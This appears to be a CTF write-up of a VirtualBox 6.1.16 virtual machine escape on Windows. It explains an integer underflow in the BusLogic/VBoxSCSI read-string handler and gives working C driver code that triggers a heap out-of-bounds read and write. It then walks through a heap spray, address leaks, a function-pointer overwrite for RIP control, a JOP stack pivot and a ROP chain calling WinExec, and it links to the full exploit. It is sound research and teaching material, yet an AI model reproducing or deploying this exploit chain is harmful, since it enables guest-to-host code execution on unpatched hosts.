Escaping VirtualBox 6.1: Virtual Machine Escape Exploit
This post is about a VM escape exploit for a bug in VirtualBox 6.1.16 on Windows.
Many thanks to the organizers for hosting this great competition, especially to ChenNan for creating this challenge, M4x for always being helpful, answering our questions and sitting with us through the many demo attempts and of course all the people involved in writing the exploit.
Let’s get to some pwning 😀
Discovering the Vulnerability
The challenge description already hints at where a bug might be:
Goal:
Please escape VirtualBox and spawn a calc(“C:\Windows\System32\calc.exe”) on the host operating system.
You have the full permissions of the guest operating system and can do anything in the guest, including loading drivers, etc.
But you can’t do anything in the host, including modifying the guest configuration file, etc.
Hint: SCSI controller is enabled and marked as bootable.
Environment:
In order to ensure a clean environment, we use virtual machine nesting to build the environment. The details are as follows:
- VirtualBox:6.1.16-140961-Win_x64.
- Host: Windows10_20H2_x64 Virtual machine in Vmware_16.1.0_x64.
- Guest: Windows7_sp1_x64 Virtual machine in VirtualBox_6.1.16_x64.
The only special thing about the VM is that the SCSI controller is enabled and marked bootable, so that's the place for us to start looking for vulnerabilities.
Here are the operations the SCSI device supports:
// /src/VBox/Devices/Storage/DevBusLogic.cpp
// [...]
if (fBootable)
{
/* Register I/O port space for BIOS access. */
rc = PDMDevHlpIoPortCreateExAndMap(pDevIns, BUSLOGIC_BIOS_IO_PORT, 4 /*cPorts*/, 0 /*fFlags*/,
buslogicR3BiosIoPortWrite, // Write a byte
buslogicR3BiosIoPortRead, // Read a byte
buslogicR3BiosIoPortWriteStr, // Write a string
buslogicR3BiosIoPortReadStr, // Read a string
NULL /*pvUser*/,
"BusLogic BIOS" , NULL /*paExtDesc*/, &pThis->hIoPortsBios);
// [...]
}
// [...]
The SCSI device implements a simple state machine with a global heap-allocated buffer. When initiating the state machine, we set the buffer size, and the state machine sets a global buffer pointer to the start of that buffer. From there on, we can either read one or more bytes, or write one or more bytes. Every read or write operation advances the buffer pointer. This means that after reading a byte from the buffer, we can't write that same byte (and vice versa), because the buffer pointer has already moved past it.
While auditing the vboxscsiReadString function, tsuro and spq found something interesting:
// src/VBox/Devices/Storage/VBoxSCSI.cpp
/**
* @retval VINF_SUCCESS
*/
int vboxscsiReadString(PPDMDEVINS pDevIns, PVBOXSCSI pVBoxSCSI, uint8_t iRegister,
uint8_t *pbDst, uint32_t *pcTransfers, unsigned cb)
{
RT_NOREF(pDevIns);
LogFlowFunc(("pDevIns=%#p pVBoxSCSI=%#p iRegister=%d cTransfers=%u cb=%u\n",
pDevIns, pVBoxSCSI, iRegister, *pcTransfers, cb));
/*
* Check preconditions, fall back to non-string I/O handler.
*/
Assert(*pcTransfers > 0);
/* Read string only valid for data in register. */
AssertMsgReturn(iRegister == 1, ("Hey! Only register 1 can be read from with string!\n"), VINF_SUCCESS);
/* Accesses without a valid buffer will be ignored. */
AssertReturn(pVBoxSCSI->pbBuf, VINF_SUCCESS);
/* Check state. */
AssertReturn(pVBoxSCSI->enmState == VBOXSCSISTATE_COMMAND_READY, VINF_SUCCESS);
Assert(!pVBoxSCSI->fBusy);
RTCritSectEnter(&pVBoxSCSI->CritSect);
/*
* Also ignore attempts to read more data than is available.
*/
uint32_t cbTransfer = *pcTransfers * cb;
if (pVBoxSCSI->cbBufLeft > 0)
{
Assert(cbTransfer <= pVBoxSCSI->cbBuf); // --- [1] ---
if (cbTransfer > pVBoxSCSI->cbBuf)
{
memset(pbDst + pVBoxSCSI->cbBuf, 0xff, cbTransfer - pVBoxSCSI->cbBuf);
cbTransfer = pVBoxSCSI->cbBuf; /* Ignore excess data (not supposed to happen). */
}
/* Copy the data and adance the buffer position. */
memcpy(pbDst,
pVBoxSCSI->pbBuf + pVBoxSCSI->iBuf, // --- [2] ---
cbTransfer);
/* Advance current buffer position. */
pVBoxSCSI->iBuf += cbTransfer;
pVBoxSCSI->cbBufLeft -= cbTransfer; // --- [3] ---
/* When the guest reads the last byte from the data in buffer, clear
everything and reset command buffer. */
if (pVBoxSCSI->cbBufLeft == 0) // --- [4] ---
vboxscsiReset(pVBoxSCSI, false /*fEverything*/);
}
else
{
AssertFailed();
memset(pbDst, 0, cbTransfer);
}
*pcTransfers = 0;
RTCritSectLeave(&pVBoxSCSI->CritSect);
return VINF_SUCCESS;
}
We fully control cbTransfer in this function. The function first makes sure that we're not trying to read more than the buffer size [1]. Then it copies cbTransfer bytes from the global buffer into another buffer [2], which will be sent to the guest driver. Finally, cbTransfer bytes get subtracted from the remaining size of the buffer [3], and if that remaining size hits zero [4], it resets the SCSI device and requires the user to reinitiate the state machine before reading any more bytes.
So much for the logic, but what's the issue here? The check at [1] ensures that no single read operation reads more than the buffer's total size. But this is the wrong check: it should verify that no single read can read more than the buffer has left. Let's say we allocate a buffer with a size of 40 bytes. Now we call this function to read 39 bytes. This advances the buffer pointer to the 40th byte and leaves cbBufLeft at 1. Now we call the function again and tell it to read 2 more bytes. The check in [1] won't stop us, since 2 is less than the buffer size of 40, yet we will have read 41 bytes in total. Additionally, the subtraction in [3] underflows: 1 - 2 wraps around and cbBufLeft is set to UINT32_MAX. Since cbBufLeft is now non-zero, the reset at [4] never happens. This same cbBufLeft is checked when doing write operations, and since it is now very large, we're also able to write bytes outside of our buffer.
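To make the arithmetic concrete, here is a toy model in C of the bookkeeping in vboxscsiReadString. It is a sketch, not VirtualBox code: the ScsiModel struct and the model_init/model_read functions are hypothetical names, the memcpy itself is left out, and it assumes a release build in which the Assert at [1] is compiled out, so only the clamp against cbBuf remains.

```c
#include <assert.h>
#include <stdint.h>

/* Hypothetical stand-in for the VBOXSCSI fields that matter here. */
typedef struct {
    uint32_t cbBuf;     /* buffer size chosen when the state machine was initiated */
    uint32_t iBuf;      /* current read/write position */
    uint32_t cbBufLeft; /* bytes the device believes are still unread */
    int      fReset;    /* set when the reset at [4] would run */
} ScsiModel;

static void model_init(ScsiModel *s, uint32_t cbBuf) {
    assert(cbBuf > 0);
    s->cbBuf = cbBuf;
    s->iBuf = 0;
    s->cbBufLeft = cbBuf;
    s->fReset = 0;
}

/* Mirrors only the position/size bookkeeping of the read path. */
static uint32_t model_read(ScsiModel *s, uint32_t cbTransfer) {
    if (s->cbBufLeft == 0)
        return 0;                  /* else-branch: nothing is copied */
    if (cbTransfer > s->cbBuf)     /* [1]: compared against cbBuf, not cbBufLeft */
        cbTransfer = s->cbBuf;
    /* [2]: memcpy(pbDst, pbBuf + iBuf, cbTransfer) would run here */
    s->iBuf += cbTransfer;
    s->cbBufLeft -= cbTransfer;    /* [3]: unsigned subtraction may wrap */
    if (s->cbBufLeft == 0)         /* [4] */
        s->fReset = 1;
    return cbTransfer;
}
```

Calling model_init(&s, 40), then model_read(&s, 39) and model_read(&s, 2), leaves iBuf at 41 and cbBufLeft at UINT32_MAX, with fReset still 0: the device never resets and keeps believing almost 4 GiB are available.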
Getting OOB read/write
We understand the vulnerability, so it's time to develop a driver to exploit it. Ironically enough, the "getting a driver to build" part was actually one of the hardest (and most annoying) parts of the exploit development. malle set out to build VirtualBox from source so that we would have symbols and a debuggable process, while 0x4d5a came up with the idea of using the HEVD driver as a base to work with, since it does some similar things to what we need. Now let's finally start writing some code.
Here’s how we triggered the bug:
#include <intrin.h>
#include <stdint.h>

#define BUFFER_SIZE 1024

void exploit(void) {
    static const uint8_t cdb[1] = {0};
    static const unsigned short port = 0x434; // I/O port base
    uint8_t buf[BUFFER_SIZE];
    // reset the state machine
    __outbyte(port + 3, 0);
    // initiate a write operation
    __outbyte(port + 0, 0); // TargetDevice (0)
    __outbyte(port + 0, 1); // direction (to device)
    __outbyte(port + 0, (uint8_t)(((BUFFER_SIZE >> 12) & 0xf0) | (sizeof(cdb) & 0xf))); // buffer length hi & cdb length
    __outbyte(port + 0, BUFFER_SIZE & 0xff);        // buffer length low
    __outbyte(port + 0, (BUFFER_SIZE >> 8) & 0xff); // buffer length mid
    for (size_t i = 0; i < sizeof(cdb); i++)
        __outbyte(port + 0, cdb[i]);
    // move the buffer pointer to 8 bytes after the buffer and the remaining bytes to -8
    __inbytestring(port + 1, buf, BUFFER_SIZE - 1); // read bufsize-1 bytes
    __inbytestring(port + 1, buf, 9);               // read 9 more bytes
    // fill buf with 0xdeadbeef
    for (size_t i = 0; i < sizeof(buf); i += 4)
        *((uint32_t *)(&buf[i])) = 0xdeadbeef;
    // write it past the end of the buffer, over and over
    for (int i = 0; i < 10000; i++)
        __outbytestring(port + 1, buf, sizeof(buf));
}
The driver first has to initiate the SCSI state machine with a buffer size of bufsize. Then we read bufsize-1 bytes, followed by 9 more bytes. We chose 9 instead of 2 bytes so that the buffer pointer is 8-byte aligned after the overflow: it ends up at buffer+8, with cbBufLeft at -8. Finally, we overwrite the roughly 10,000 KiB following buffer+8 (10,000 writes of 1024 bytes each) with 0xdeadbeef.
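The setup sequence packs the buffer length into three register writes, and the two reads then leave the device in the skewed state described above. The sketch below reproduces both calculations in plain C so they can be checked without a guest. The encoding follows the byte layout implied by the driver's comments (bits 16 to 19 in the high nibble of the first byte, then bits 0 to 7 and bits 8 to 15); SizeBytes, encode_size, decode_size and after_two_reads are hypothetical helper names.

```c
#include <assert.h>
#include <stdint.h>

/* The three size-related bytes written to register 0 after
   TargetDevice and the transfer direction. */
typedef struct {
    uint8_t size_hi_cdb; /* bits 16-19 of the size in the high nibble, CDB length in the low nibble */
    uint8_t size_lo;     /* bits 0-7 */
    uint8_t size_mid;    /* bits 8-15 */
} SizeBytes;

static SizeBytes encode_size(uint32_t cbBuf, uint8_t cbCdb) {
    assert(cbBuf <= 0xfffff && cbCdb <= 0xf);
    SizeBytes b;
    b.size_hi_cdb = (uint8_t)(((cbBuf >> 12) & 0xf0) | (cbCdb & 0x0f));
    b.size_lo     = (uint8_t)(cbBuf & 0xff);
    b.size_mid    = (uint8_t)((cbBuf >> 8) & 0xff);
    return b;
}

/* How the 20-bit size is reassembled from those bytes. */
static uint32_t decode_size(SizeBytes b) {
    return ((uint32_t)(b.size_hi_cdb & 0xf0) << 12)
         | ((uint32_t)b.size_mid << 8)
         | b.size_lo;
}

/* Position and remaining count after reading cbBuf-1 bytes, then `second` bytes. */
static void after_two_reads(uint32_t cbBuf, uint32_t second,
                            uint32_t *iBuf, uint32_t *cbBufLeft) {
    *iBuf = (cbBuf - 1) + second;
    *cbBufLeft = 1u - second;      /* one byte was left; wraps for second > 1 */
}
```

With bufsize = 1024 and a second read of 9 bytes, iBuf ends at 1032 (buffer+8, a multiple of 8) and cbBufLeft at 0xFFFFFFF8, which is -8 when read as a signed value.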
After loading this driver in the win7 guest, this is what we get:
As expected, the VM crashes because we corrupted the heap. Now we know that our OOB read/write works, and since working with drivers was annoying, we decided to modify the driver one last time to expose the vulnerability to user space. The driver was modified to accept this Req struct via an IOCTL:
enum operations {
OPERATION_OUTBYTE = 0,
OPERATION_INBYTE = 1,
OPERATION_OUTSTR = 2,
OPERATION_INSTR = 3,
};
typedef struct {
volatile unsigned int port;
volatile unsigned int operation;
volatile unsigned int data_byte_out;
} Req;
This enables us to use the driver as a bridge to communicate with the SCSI device from any user-space program. This makes exploit prototyping a whole lot faster and has the added benefit of removing the need to touch Windows drivers ever again (well, for the rest of this exploit anyway :D).
The bug gives us a linear heap OOB read/write primitive. Our goal is to get from here to arbitrary code execution, so let's put this bug to use!
Leaking VBoxC.dll and heap addresses
We’re able to dump heap data using our OOB read but we’re still far from code execution. This is a good point to start leaking addresses. The least we’ll require for nice exploitation is a code leak (i.e. leaking the address of any dll in order to get access to gadgets) and a heap address leak to facilitate any post exploitation we might want to do.
This calls for a heap spray to get some desired objects after our leak object to read their pointers. We’d like the objects we spray to tick the following boxes:
- Contains a pointer into a dll
- Contains a heap address
- (Contains some kind of function pointer which might get useful later on)
After going through some options, we eventually opted for an HGCMMsgCall spray. Here's its (stripped-down) structure. It's pretty big, so I removed any parts that we don't care about:
class HGCMMsgCall: public HGCMMsgHeader
{
// A list of parameters including a
// char[] with controlled contents
VBOXHGCMSVCPARM *paParms;
// [...]
};
class HGCMMsgHeader: public HGCMMsgCore
{
public:
// [...]
/* Port to be informed on message completion. */
PPDMIHGCMPORT pHGCMPort;
};
typedef struct PDMIHGCMPORT
{
// [...]
/**
* Checks if @a pCmd was cancelled.
*
* @returns true if cancelled, false if not.
* @param pInterface Pointer to this interface.
* @param pCmd The command we're checking on.
*/
DECLR3CALLBACKMEMBER(bool, pfnIsCmdCancelled,(PPDMIHGCMPORT pInterface, PVBOXHGCMCMD pCmd));
// [...]
} PDMIHGCMPORT;
class HGCMMsgCore : public HGCMReferencedObject
{
private:
// [...]
/** Next element in a message queue. */
HGCMMsgCore *m_pNext;
/** Previous element in a message queue.
* @todo seems not necessary. */
HGCMMsgCore *m_pPrev;
// [...]
};
It contains a VTable pointer, two heap pointers (m_pNext and m_pPrev, because HGCMMsgCall objects are managed in a doubly linked list) and a callback function pointer in m_pfnCallback, so HGCMMsgCall definitely fits the bill for a good spray target. Another nice thing is that we're able to trigger a call through the pHGCMPort->pfnIsCmdCancelled pointer whenever we like. This works because this pointer gets invoked on all already allocated messages whenever a new message is created. HGCMMsgCall's size is 0x70, so we'll have to initiate the SCSI state machine with the same size to ensure our buffer gets allocated in the same heap region as our sprayed objects.
Conveniently enough, niklasb has already prepared a function we can borrow to spray HGCMMsgCall objects.
Calling niklas' wait_prop function allocates an HGCMMsgCall object with a controlled pszPatterns field. This char array is very useful because it is referenced by the sprayed objects and can be easily identified on the heap.
Spraying on the Low-Fragmentation Heap can be a little tricky, but after some trial and error we arrived at the following spray strategy:
- We iterate 64 times
- Each time, we create a client and spray 16 HGCMMsgCalls
That way, we seemed to reliably get a bunch of HGCMMsgCalls located after our leak buffer, which allows us to read and write their fields.
First things first: getting the code leak is simple enough. All we have to do is read heap memory until we find something that matches the structure of one of our HGCMMsgCalls and read the first quad-word of that object. The VTable points into VBoxC.dll, so we can use this leak to calculate the base address of VBoxC.dll for future use.
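The write-up does not spell out exactly how an HGCMMsgCall is recognized in the dump. One heuristic that can narrow the search (a swapped-in technique, not necessarily what we used) relies on Windows mapping images at 64 KiB-aligned base addresses, so the low 16 bits of any pointer into VBoxC.dll equal the low 16 bits of its RVA. The sketch below scans a dump for such a qword and turns it into a base address. The vtable RVA is an assumption that has to come from the exact VBoxC.dll build, and find_vtable and image_base_from_vtable are hypothetical names.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define USER_SPACE_LIMIT 0x00007fffffffffffULL

/* Returns the offset of the first 8-byte-aligned qword in `dump` that
   could be a pointer to the vtable at `vtable_rva`, or (size_t)-1. */
static size_t find_vtable(const uint8_t *dump, size_t len, uint64_t vtable_rva) {
    for (size_t off = 0; off + 8 <= len; off += 8) {
        uint64_t q;
        memcpy(&q, dump + off, sizeof q);      /* avoids unaligned/aliasing issues */
        if (q > vtable_rva && q <= USER_SPACE_LIMIT &&
            ((q - vtable_rva) & 0xffff) == 0)  /* candidate base is 64 KiB aligned */
            return off;
    }
    return (size_t)-1;
}

static uint64_t image_base_from_vtable(uint64_t vtable_ptr, uint64_t vtable_rva) {
    uint64_t base = vtable_ptr - vtable_rva;
    assert((base & 0xffff) == 0);
    return base;
}
```

A hit only marks a candidate; any user-mode pointer that happens to share those 16 bits also matches, so the surrounding fields still have to be checked against the expected object layout.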
Getting the heap leak is not as straightforward. We can easily read the m_pNext or m_pPrev fields to get a pointer to some other HGCMMsgCall object, but we don't have any clue where that object is located relative to our current buffer position. So reading m_pNext and m_pPrev of one object is useless… But what if we did the same for a second object? Maybe you can already see where this is going. Since these objects are organized in a doubly linked list, we can abuse their properties to match an object A to its next neighbor B.
This works because of this property:
addr(B) - addr(A) == A->m_pNext - B->m_pPrev
To get the address of B, we have to do the following:
- Read object A and save its pointers
- Take note of how many bytes we had to read until we found the next object B, in a variable x
- Read object B and save its pointers
- If A->m_pNext - B->m_pPrev == x, we most likely found the right neighbor and know that B is at A->m_pNext. If not, we just keep reading objects
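The neighbor-matching steps above translate into a short loop. The sketch assumes the dump has already been scanned and that each candidate object was recorded with its offset in the dump and the m_pNext and m_pPrev values read from it; the Candidate struct and match_neighbor are hypothetical names, and the candidates must be sorted by offset.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* One HGCMMsgCall-like object spotted in the OOB dump. */
typedef struct {
    size_t   off;    /* offset of the object within our dump */
    uint64_t pNext;  /* value read from m_pNext */
    uint64_t pPrev;  /* value read from m_pPrev */
} Candidate;

/* Walks consecutive candidates A, B and returns the index of the first B
   for which A->m_pNext - B->m_pPrev equals their distance x in the dump.
   *addr_b receives B's absolute address (A->m_pNext). Returns -1 if none match. */
static long match_neighbor(const Candidate *c, size_t n, uint64_t *addr_b) {
    for (size_t i = 0; i + 1 < n; i++) {
        const Candidate *a = &c[i];
        const Candidate *b = &c[i + 1];
        assert(b->off > a->off);
        uint64_t x = (uint64_t)(b->off - a->off);
        if (a->pNext - b->pPrev == x) {  /* addr(B) - addr(A) on both sides */
            *addr_b = a->pNext;
            return (long)(i + 1);
        }
    }
    return -1;
}
```

Once B's address and dump offset are both known, every other offset in the same dump can be converted into an absolute heap address by adding the difference between the two offsets.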
This is pretty fast and works somewhat reliably. Equipped with our heap address and VBoxC.dll base address leaks, we can move on to hijacking the execution flow.
Getting RIP control
Remember those pfnIsCmdCancelled callbacks? Those will make for a very short "Getting RIP control" section… 😛
There's really not that much to this part of the exploit. We only have to read heap data until we find another one of our HGCMMsgCalls and overwrite its pHGCMPort pointer so that it points to memory we control. As soon as a new message gets allocated, this method is called on our corrupted object, and pHgcmPort->pfnIsCmdCancelled is read from our fake structure:
/**
* @interface_method_impl{VBOXHGCMSVCHELPERS,pfnIsCallCancelled}
*/
/* static */ DECLCALLBACK(bool) HGCMService::svcHlpIsCallCancelled(VBOXHGCMCALLHANDLE callHandle)
{
HGCMMsgHeader *pMsgHdr = (HGCMMsgHeader *)callHandle;
AssertPtrReturn(pMsgHdr, false);
PVBOXHGCMCMD pCmd = pMsgHdr->pCmd;
AssertPtrReturn(pCmd, false);
PPDMIHGCMPORT pHgcmPort = pMsgHdr->pHGCMPort; // We corrupted pHGCMPort
AssertPtrReturn(pHgcmPort, false);
return pHgcmPort->pfnIsCmdCancelled(pHgcmPort, pCmd); // --- Profit ---
}
Internally, svcHlpIsCallCancelled loads pHgcmPort into r8 and executes a jmp [r8+0x10] instruction, which fetches pfnIsCmdCancelled from the structure that pHgcmPort points to. Here's what happens if that fetched pointer is 0x0000000041414141:
Code execution
At this point, we are able to redirect code execution anywhere we want. But where do we want to redirect it to? Oftentimes getting RIP control is already enough to solve CTF pwnables. Glibc has these one-gadgets, which are basically addresses you jump to that instantly give you a shell. But sadly there is no leak-kernel32dll-set-rcx-to-calc-and-call-WinExec one-gadget in VBoxC.dll, which means we'll have to get a little creative once more. ROP is not an option because we don't have stack control, so the only thing left is JOP (Jump-Oriented Programming).
JOP requires some kind of register control, but at the point at which our callback is invoked, we only control a single register, r8. An additional constraint is that, since we only leaked a pointer from VBoxC.dll, we're limited to JOP gadgets within that library. Our goal for this JOP chain is to perform a stack pivot into some memory on the heap where we will place a ROP chain that will do the heavy lifting and eventually pop a calc.
Sounds easy enough, let’s see what we can come up with 😛
Our first issue is that we need to find some memory area where we can put the JOP data. Since our OOB write only allows us to write to the heap, that'll have to do. But we can't just go around writing stuff to the heap, because that will most likely corrupt some heap metadata, or newly allocated objects will corrupt our data. So we need to get a buffer allocated first and write to that. We can abuse the pszPatterns field in our spray for that. If we extend the pattern size to 0x70 bytes and place a known magic value in the first quad-word, we can use the OOB read to find that magic on the heap and overwrite the remaining 0x68 bytes with our payload. We're the ones who allocated that string, so it won't get freed randomly as long as we hold a reference to it, and since we already leaked a heap address, we're also able to calculate the address of our string and use it in the JOP chain.
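Because both the dump offset and the address of a neighbor object are known, the position of the magic-tagged string follows from a single subtraction. The sketch below shows that step together with one possible layout of a fake PDMIHGCMPORT inside the 0x70-byte string. It assumes the corrupted pHGCMPort is pointed at the start of the string, so the jmp [r8+0x10] fetches the qword at offset 0x10; the magic value, the first gadget address and all function names are hypothetical.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define PATTERN_SIZE 0x70 /* size of the enlarged pszPatterns string */

/* Offset of the first 8-byte-aligned magic whose whole string fits in the dump, or (size_t)-1. */
static size_t find_magic(const uint8_t *dump, size_t len, uint64_t magic) {
    for (size_t off = 0; off + PATTERN_SIZE <= len; off += 8) {
        uint64_t q;
        memcpy(&q, dump + off, sizeof q);
        if (q == magic)
            return off;
    }
    return (size_t)-1;
}

/* Converts a dump offset into an absolute address, given one object
   (e.g. B from the neighbor matching) whose address and offset are known. */
static uint64_t dump_off_to_addr(uint64_t addr_ref, size_t off_ref, size_t off) {
    return addr_ref + (uint64_t)off - (uint64_t)off_ref;
}

/* Payload for the string: the magic stays in place, and the qword at 0x10
   plays the role of pfnIsCmdCancelled in the fake port structure. */
static void build_fake_port(uint8_t out[PATTERN_SIZE], uint64_t magic, uint64_t first_gadget) {
    assert(out != NULL);
    memset(out, 0, PATTERN_SIZE);
    memcpy(out + 0x00, &magic, sizeof magic);
    memcpy(out + 0x10, &first_gadget, sizeof first_gadget);
}
```

In the exploit itself only the 0x68 bytes after the magic are written back with the OOB write, so the magic slot of the payload just mirrors what is already on the heap.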
After spending ~30 minutes straight reading through VBoxC.dll assembly together with localo, we finally came up with a way to get from r8 control to rsp control. I had trouble figuring out a way to describe the JOP chain, so CSS wizard localo created an interactive visualization to make following the chain easier. To simplify things even further, the visualization shows all registers with uncontrolled contents as XXX and ignores any reads from, or uncontrolled writes to, those registers.
Let's assume the JOP payload in our string is located at 0x1230 and r8 points to it. We trigger the callback, which executes the jmp [r8+0x10].
We managed to get rsp to point into our string, and the next ret will kick-start ROP execution. From this point on, it's just a matter of crafting a textbook WinExec("calc\x00") ROP chain. But for the sake of completeness, I'll mention the gist of it. First, we read the address of a symbol from VBoxC.dll's IAT. The IAT is comparable to the global offset table on Linux and contains pointers to dynamically linked library symbols. We'll use this to leak a pointer into kernel32.dll. Then we can calculate the runtime address of WinExec() in kernel32.dll, set rcx to point to "calc\x00" and call WinExec, which will pop a calculator.
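The chain has to do the IAT dereference at runtime, since the IAT lives in VBoxC.dll's image and not on the heap our OOB read can reach, but the arithmetic itself is easy to state in C. All offsets in this sketch are hypothetical placeholders that have to come from the exact VBoxC.dll and kernel32.dll builds on the host. One caveat: many kernel32 exports are forwarded to other DLLs, in which case the IAT entry holds the forwarded target's address, so the import used for the leak should be one that kernel32.dll implements itself.

```c
#include <assert.h>
#include <stdint.h>

/* Hypothetical offsets for one particular VBoxC.dll / kernel32.dll pair. */
typedef struct {
    uint64_t iat_slot_rva; /* RVA of the chosen IAT entry inside VBoxC.dll */
    uint64_t import_rva;   /* RVA of the imported function inside kernel32.dll */
    uint64_t winexec_rva;  /* RVA of WinExec inside kernel32.dll */
} Offsets;

/* Address the chain dereferences to obtain a kernel32 pointer
   (computable in advance from the VBoxC.dll leak). */
static uint64_t iat_slot_addr(uint64_t vboxc_base, const Offsets *o) {
    return vboxc_base + o->iat_slot_rva;
}

/* Value the chain then computes from the leaked pointer and jumps to. */
static uint64_t winexec_addr(uint64_t leaked_import, const Offsets *o) {
    assert(leaked_import >= o->import_rva);
    uint64_t kernel32_base = leaked_import - o->import_rva;
    return kernel32_base + o->winexec_rva;
}
```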
However, there is a little twist to this. A keen eye might have noticed that we set rbp to 0x10000000 and that we use a leave; jmp rax gadget to get to WinExec in rop_gadget_5 instead of just a simple jmp rax. That is because we were experiencing some major issues with stack alignment and stack frame size when directly calling WinExec with the stack pointer still pointing into our heap payload. It turns out that WinExec sets up a rather large stack frame, and the distance between our fake stack and the start of the heap isn't always large enough to contain it, so we were running into page faults. Luckily, 0x4d5a and localo knew from reading this blog post about the vram section that it has weak randomisation, and it turns out that the range from 0xcb10000 to 0x13220000 is always mapped by that section. So if we set rbp to 0x10000000 and execute a leave; jmp rax, the leave moves the stack pointer to 0x10000000 (0x10000008 once rbp has been popped) before jumping to WinExec, thereby giving it enough space to do all the stack setup it likes 😉
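The effect of the final gadget can be checked with a few lines of C. leave is equivalent to mov rsp, rbp followed by pop rbp, so with rbp = 0x10000000 the stack pointer is 0x10000008 when jmp rax transfers control. That value also satisfies the Windows x64 calling convention, which expects RSP to be 8 modulo 16 on function entry (as if a call had just pushed a return address). The Regs struct and helper names are hypothetical; the vram bounds are the ones quoted above.

```c
#include <assert.h>
#include <stdint.h>

#define VRAM_LO 0x0cb10000ULL /* start of the range reported as always mapped */
#define VRAM_HI 0x13220000ULL /* end of that range */

typedef struct {
    uint64_t rsp, rbp, rax, rip;
} Regs;

/* leave; jmp rax. `qword_at_rbp` is the value stored at [rbp], which pop rbp loads. */
static void leave_jmp_rax(Regs *r, uint64_t qword_at_rbp) {
    r->rsp = r->rbp;          /* mov rsp, rbp */
    r->rbp = qword_at_rbp;    /* pop rbp: load [rsp] ... */
    r->rsp += 8;              /* ... and advance rsp */
    r->rip = r->rax;          /* jmp rax */
}

/* Windows x64: RSP % 16 == 8 on function entry. */
static int entry_aligned(uint64_t rsp) {
    return (rsp & 0xf) == 8;
}

/* Bytes the callee can use below rsp before leaving the mapped range. */
static uint64_t stack_room(uint64_t rsp) {
    assert(rsp > VRAM_LO && rsp <= VRAM_HI);
    return rsp - VRAM_LO;
}
```

With rsp at 0x10000008, stack_room reports 0x34F0008 bytes, i.e. more than 50 MiB of mapped memory below the new stack pointer.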
Demo
‘nuff said! Here’s the demo: https://www.youtube.com/embed/mjKxafMbpS0
You can find this version of our exploit here.
Credits
Writing this exploit was a joint effort of a bunch of people.
- ESPR’s spq, tsuro and malle who don’t need an introduction 😀
- My ALLES! teammates and Windows experts Alain Rödel aka 0x4d5a and Felipe Custodio Romero aka localo
- niklasb for his prior work and for some helpful pointers!
“A ROP chain a day keeps the doctor away. Always keep that in mind, my grandpa always used to say.”
~ Niklas Baumstark (2021)
I had the pleasure of working with this group of talented people over the course of multiple sleepless nights and days, during the CTF and even after it was over, just to get the exploit working properly on a release build of VirtualBox and to improve its stability. This truly shows what a small group of dedicated people is able to achieve in an incredibly short period of time if they put their minds to it! I’d like to thank every single one of you 😀
Conclusion
This was my first time working with VirtualBox, so it was a very educational and fun exercise. We managed to write a working exploit for a debug build of VirtualBox with 3 hours left in the CTF, but sadly we weren't able to port it to a release build in time, because VirtualBox's anti-debugging made figuring out what exactly was breaking very hard. The next day, we rebuilt VirtualBox without the anti-debugging/process hardening and finally ported the exploit properly to the latest release build of VirtualBox.